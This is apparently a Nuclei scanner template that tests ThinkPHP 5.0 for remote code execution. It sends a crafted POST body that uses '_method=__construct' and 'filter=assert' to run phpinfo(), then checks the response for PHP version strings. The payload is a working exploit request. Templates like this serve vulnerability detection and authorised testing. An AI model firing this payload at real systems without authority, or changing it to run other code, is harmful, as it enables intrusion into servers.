id: tp-50-rce

info:
  name: ThinkPHP命令执行
  author: str1am
  severity: critical
  tags: thinkphp,rce

requests:
  - method: POST
    path:
      - "{{BaseURL}}/?s=index/index/index"
    body: "s=phpinfo()&_method=__construct&filter=assert"
    headers:
      Content-Type: application/x-www-form-urlencoded

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "PHP Extension"
          - "PHP Version"
        condition: and
